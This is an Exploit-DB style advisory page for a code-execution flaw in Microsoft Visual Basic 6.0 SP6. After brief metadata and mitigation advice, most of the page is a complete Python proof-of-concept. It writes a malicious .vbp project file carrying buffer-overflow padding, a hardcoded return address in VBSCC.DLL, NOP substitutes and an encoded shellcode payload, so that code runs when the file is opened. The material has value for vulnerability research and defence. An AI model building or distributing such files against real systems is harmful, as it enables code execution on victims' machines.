Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution

vendor:

Microsoft Visual Basic Enterprise Edition

by:

shinnai

7.5

CVSS

HIGH

Code Execution

CWE

Product Name: Microsoft Visual Basic Enterprise Edition

Affected Version From: Microsoft Visual Basic Enterprise Edition 6.0 SP6

Affected Version To: Microsoft Visual Basic Enterprise Edition 6.0 SP6

Patch Exists: No

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Pro SP2 Ita

Unknown

Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution

This exploit allows for code execution in Microsoft Visual Basic Enterprise Edition 6.0 SP6. The author made modifications to the original exploit to address a memory exception issue. The exploit is dedicated to Italian VB6 programmers.

Mitigation:

Apply necessary patches and updates to address the vulnerability. Avoid running untrusted or unknown Visual Basic files.

Source

Exploit-DB raw data:

#usage: vbexploit.py FileName.vbp

import sys

print "--------------------------------------------------------------------------"
print " [PoC_2] Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution "
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " based on Koshi exploit"
print " http://www.milw0rm.com/exploits/4361\n"
print " I try his exploit on Windows XP Pro SP2 Ita, full patched and it doesn't"
print " work, but he said:\n"
print ' "# ...backwards..if you don' + "'t" + ' know why, then gtfo."\n'
print " ok, now I know why brotha, I got this exception:\n"
print ' "Access violation when writing to [63636363]"\n'
print " so I search another way to get exploit working but I need to do some"
print ' changes to memory address ("00" became "20") and nop ("90" became "3F").'
print " Well, here it is a PoC_2 and if it doesn't work and" + ' "you don' + "'t know why,"
print ' then"' + "... feel free to ask ;)\n"
print " dedicated to all Italian vb6 programmers... be safe bros"
print "--------------------------------------------------------------------------"

buff = "A" * 494

EIP = "\x37\x17\x8B\x60"; #call ESP from VBSCC.DLL esp, you can (or must) change as you like

buff2 = "A" * 12

RW_Memory = "\x20\x20\x01\x20" #patched writeable memory address "\x00\x00\x01\x00"

nop = "\x3F\x3F\x3F\x3F" #patched nop "\x90"

shellcode = \
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\
"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\
"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"

try:
    vb_proj = \
        'Type=Exe\n'+\
        'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\WINDOWS'+\
	'\system32\stdole2.tlb#OLE Automation' + buff + EIP + buff2 + RW_Memory + nop + shellcode + nop +\
        '\nStartup="Sub Main"\n'+\
        'Command32=""\n'+\
        'Name=' + sys.argv[1]+\
        '\nHelpContextID="0"\n'+\
        'CompatibleMode="0"\n'+\
        'MajorVer=1\n'+\
        'MinorVer=0\n'+\
        'RevisionVer=0\n'+\
        'AutoIncrementVer=0\n'+\
        'ServerSupportFiles=0\n'+\
        'VersionCompanyName="xxx"\n'+\
        'CompilationType=0\n'+\
        'OptimizationType=0\n'+\
        'FavorPentiumPro(tm)=0\n'+\
        'CodeViewDebugInfo=0\n'+\
        'NoAliasing=0\n'+\
        'BoundsCheck=0\n'+\
        'OverflowCheck=0\n'+\
        'FlPointCheck=0\n'+\
        'FDIVCheck=0\n'+\
        'UnroundedFP=0\n'+\
        'StartMode=0\n'+\
        'Unattended=0\n'+\
        'Retained=0\n'+\
        'ThreadPerObject=0\n'+\
        'MaxNumberOfThreads=1\n\n'+\
        '[MS Transaction Server]\n'+\
        'AutoRefresh=1'
    
    out_file = open(sys.argv[1],'w')
    out_file.write(vb_proj)
    out_file.close()
    print "\nFILE CREATION COMPLETED!\n"
except:
    print " \n -------------------------------------"
    print "  Usage: exploit.py FileName.vbp"
    print " -------------------------------------"
    print "\nAN ERROR OCCURS DURING FILE CREATION!"

# milw0rm.com [2007-09-19]